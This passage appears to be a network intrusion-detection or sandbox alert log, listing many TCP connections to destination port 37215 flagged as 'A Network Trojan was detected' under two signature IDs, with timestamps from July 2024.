                  Source Port:49636
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.530198
                  SID:2829579
                  Source Port:59646
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.134098
                  SID:2829579
                  Source Port:49366
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.876491
                  SID:2835222
                  Source Port:38960
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.876445
                  SID:2829579
                  Source Port:58612
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:45.660252
                  SID:2829579
                  Source Port:39988
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.482479
                  SID:2829579
                  Source Port:49370
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:45.591326
                  SID:2835222
                  Source Port:46256
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:07.292595
                  SID:2835222
                  Source Port:58324
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.853757
                  SID:2829579
                  Source Port:51346
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.347506
                  SID:2835222
                  Source Port:44412
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.942698
                  SID:2835222
                  Source Port:38878
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:34.217028
                  SID:2835222
                  Source Port:36614
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.748001
                  SID:2835222
                  Source Port:57978
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.469392
                  SID:2829579
                  Source Port:53598
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:26.602369
                  SID:2829579
                  Source Port:40346
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.608581
                  SID:2835222
                  Source Port:36658
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.966224
                  SID:2835222
                  Source Port:40476
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.330211
                  SID:2835222
                  Source Port:49258
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:23.350374
                  SID:2835222
                  Source Port:50790
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:33.251804
                  SID:2835222
                  Source Port:60118
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.614472
                  SID:2835222
                  Source Port:48826
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.624232
                  SID:2835222
                  Source Port:44352
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:08.402603
                  SID:2835222
                  Source Port:58680
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.926715
                  SID:2835222
                  Source Port:59226
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.329520
                  SID:2829579
                  Source Port:34208
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:32.605681
                  SID:2835222
                  Source Port:46346
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:03.009632
                  SID:2835222
                  Source Port:35198
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:27.058852
                  SID:2829579
                  Source Port:55540
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.849497
                  SID:2835222
                  Source Port:56190
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:20.460517
                  SID:2829579
                  Source Port:36332
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.817367
                  SID:2835222
                  Source Port:55056
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:51.997366
                  SID:2835222
                  Source Port:50778
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:49.828950
                  SID:2835222
                  Source Port:36742
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:27.142415
                  SID:2835222
                  Source Port:50168
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:26.586309
                  SID:2829579
                  Source Port:58490
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:07.281440
                  SID:2829579
                  Source Port:52704
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:49.830587
                  SID:2829579
                  Source Port:54922
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:51.990112
                  SID:2835222
                  Source Port:38226
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:31.461924
                  SID:2829579
                  Source Port:41998
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.133869
                  SID:2835222
                  Source Port:42818
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:11.531536
                  SID:2835222
                  Source Port:39664
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:28.070223
                  SID:2835222
                  Source Port:39620
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:48.012833
                  SID:2829579
                  Source Port:51606
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.911358
                  SID:2835222
                  Source Port:46100
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.574269
                  SID:2835222
                  Source Port:58924
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.420530
                  SID:2835222
                  Source Port:58480
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.278007
                  SID:2829579
                  Source Port:46214
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.986836
                  SID:2835222
                  Source Port:45892
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:17.056962
                  SID:2835222
                  Source Port:51440
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.191289
                  SID:2829579
                  Source Port:48660
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:33.161010
                  SID:2835222
                  Source Port:38324
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.851676
                  SID:2835222
                  Source Port:35232
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.389134
                  SID:2835222
                  Source Port:55348
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.619310
                  SID:2835222
                  Source Port:47074
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.702659
                  SID:2835222
                  Source Port:42190
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.591175
                  SID:2835222
                  Source Port:43364
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:20.143169
                  SID:2835222
                  Source Port:59506
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.553454
                  SID:2829579
                  Source Port:35858
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:24.976551
                  SID:2835222
                  Source Port:33280
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:28.120575
                  SID:2829579
                  Source Port:48258
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.927122
                  SID:2835222
                  Source Port:35862
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.726250
                  SID:2829579
                  Source Port:47540
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:20.158539
                  SID:2829579
                  Source Port:46046
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.153820
                  SID:2835222
                  Source Port:39482
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.850737
                  SID:2829579
                  Source Port:57026
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:27.136540
                  SID:2835222
                  Source Port:57078
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:27.155928
                  SID:2835222
                  Source Port:35798
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:11.557326
                  SID:2835222
                  Source Port:59132
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.859810
                  SID:2829579
                  Source Port:45520
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:11.479148
                  SID:2835222
                  Source Port:39476
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.372356
                  SID:2829579
                  Source Port:35878
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:17.986594
                  SID:2835222
                  Source Port:38092
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.881196
                  SID:2829579
                  Source Port:36188
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.547528
                  SID:2835222
                  Source Port:55836
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:47.896576
                  SID:2835222
                  Source Port:60500
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:42.161476
                  SID:2835222
                  Source Port:49514
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:17.087828
                  SID:2835222
                  Source Port:56084
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:29.858032
                  SID:2835222
                  Source Port:49166
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:17.060306
                  SID:2835222
                  Source Port:42866
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:48.021519
                  SID:2829579
                  Source Port:34210
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.961226
                  SID:2835222
                  Source Port:57044
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:17.079394
                  SID:2829579
                  Source Port:50408
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.325591
                  SID:2835222
                  Source Port:48226
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.456990
                  SID:2829579
                  Source Port:35296
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.998046
                  SID:2829579
                  Source Port:43792
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:48.008674
                  SID:2835222
                  Source Port:52572
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.357505
                  SID:2835222
                  Source Port:36222
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:49.829856
                  SID:2829579
                  Source Port:51690
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.340130
                  SID:2829579
                  Source Port:48500
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:14.823553
                  SID:2835222
                  Source Port:58866
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:20.516215
                  SID:2835222
                  Source Port:39666
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:49.811589
                  SID:2835222
                  Source Port:34146
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.360027
                  SID:2835222
                  Source Port:36252
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.835988
                  SID:2835222
                  Source Port:60686
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.509517
                  SID:2829579
                  Source Port:50982
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.865761
                  SID:2835222
                  Source Port:57906
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.856754
                  SID:2829579
                  Source Port:33066
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.816832
                  SID:2835222
                  Source Port:33920
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.829086
                  SID:2835222
                  Source Port:46592
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:27.138440
                  SID:2829579
                  Source Port:50230
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:14.809992
                  SID:2835222
                  Source Port:47620
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.841879
                  SID:2835222
                  Source Port:35308
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:24.957397
                  SID:2835222
                  Source Port:53450
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:20.428131
                  SID:2835222
                  Source Port:56414
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.488012
                  SID:2835222
                  Source Port:36090
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.540694
                  SID:2835222
                  Source Port:42228
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.522324
                  SID:2835222
                  Source Port:48976
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.875965
                  SID:2829579
                  Source Port:51612
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.181230
                  SID:2835222
                  Source Port:45196
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:26.585190
                  SID:2829579
                  Source Port:33052
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.722420
                  SID:2835222
                  Source Port:59176
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:45.660346
                  SID:2829579
                  Source Port:48426
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.596894
                  SID:2835222
                  Source Port:58772
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:17.984477
                  SID:2829579
                  Source Port:56114
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.828157
                  SID:2835222
                  Source Port:59576
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.976609
                  SID:2835222
                  Source Port:46674
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:17.986664
                  SID:2829579
                  Source Port:36278
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:23.328936
                  SID:2835222
                  Source Port:57486
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.512743
                  SID:2835222
                  Source Port:34918
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:11.503966
                  SID:2829579
                  Source Port:46298
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.483664
                  SID:2835222
                  Source Port:48902
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.492988
                  SID:2829579
                  Source Port:48792
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:28.155678
                  SID:2829579
                  Source Port:56256
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:27.142531
                  SID:2835222
                  Source Port:35658
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:31.545900
                  SID:2829579
                  Source Port:40202
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:28.042131
                  SID:2829579
                  Source Port:51080
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.367348
                  SID:2829579
                  Source Port:54032
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.464589
                  SID:2835222
                  Source Port:59526
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:29.847797
                  SID:2829579
                  Source Port:58544
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.840131
                  SID:2829579
                  Source Port:34134
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:20.495859
                  SID:2829579
                  Source Port:59894
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.601191
                  SID:2829579
                  Source Port:55922
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:49.854683
                  SID:2829579
                  Source Port:46084
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.138827
                  SID:2835222
                  Source Port:49388
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:18.022260
                  SID:2829579
                  Source Port:36332
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.515486
                  SID:2835222
                  Source Port:55402
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:31.479200
                  SID:2829579
                  Source Port:41500
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.506751
                  SID:2835222
                  Source Port:40642
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.622181
                  SID:2835222
                  Source Port:58578
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:11.477430
                  SID:2829579
                  Source Port:36440
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:53.186613
                  SID:2835222
                  Source Port:56192
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:03.030888
                  SID:2835222
                  Source Port:45856
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.481265
                  SID:2835222
                  Source Port:40886
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.446439
                  SID:2835222
                  Source Port:36204
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.538160
                  SID:2829579
                  Source Port:34238
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:45.666546
                  SID:2829579
                  Source Port:36794
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.576804
                  SID:2829579
                  Source Port:57000
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.694487
                  SID:2829579
                  Source Port:59848
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.094996
                  SID:2829579
                  Source Port:38652
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:45.619051
                  SID:2829579
                  Source Port:40380
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.529158
                  SID:2829579
                  Source Port:53518
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:15.809769
                  SID:2835222
                  Source Port:39358
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:47.920838
                  SID:2835222
                  Source Port:57644
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.970105
                  SID:2829579
                  Source Port:50786
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:29.880406
                  SID:2829579
                  Source Port:57834
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.842047
                  SID:2835222
                  Source Port:45070
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.309217
                  SID:2829579
                  Source Port:38808
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:32.583920
                  SID:2835222
                  Source Port:59714
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:31.063157
                  SID:2829579
                  Source Port:48360
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.785438
                  SID:2829579
                  Source Port:42806
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:49.831923
                  SID:2829579
                  Source Port:54220
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.808876
                  SID:2829579
                  Source Port:53196
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.751291
                  SID:2829579
                  Source Port:60216
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.541812
                  SID:2835222
                  Source Port:44658
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.767768
                  SID:2835222
                  Source Port:43644
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.455545
                  SID:2835222
                  Source Port:57666
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:27.047085
                  SID:2835222
                  Source Port:33438
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:08.435452
                  SID:2835222
                  Source Port:50988
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.752380
                  SID:2829579
                  Source Port:48606
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.486233
                  SID:2829579
                  Source Port:39038
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.730213
                  SID:2835222
                  Source Port:56458
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.898852
                  SID:2829579
                  Source Port:60494
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.873311
                  SID:2835222
                  Source Port:50686
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:14.821863
                  SID:2835222
                  Source Port:53576
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:42.432060
                  SID:2835222
                  Source Port:35008
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:14.771474
                  SID:2835222
                  Source Port:51746
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.717108
                  SID:2829579
                  Source Port:56940
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:14.823553
                  SID:2835222
                  Source Port:53624
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:29.800404
                  SID:2829579
                  Source Port:50506
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:53.247062
                  SID:2829579
                  Source Port:57792
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.637252
                  SID:2829579
                  Source Port:45528
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:53.247810
                  SID:2829579
                  Source Port:53968
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:47.832991
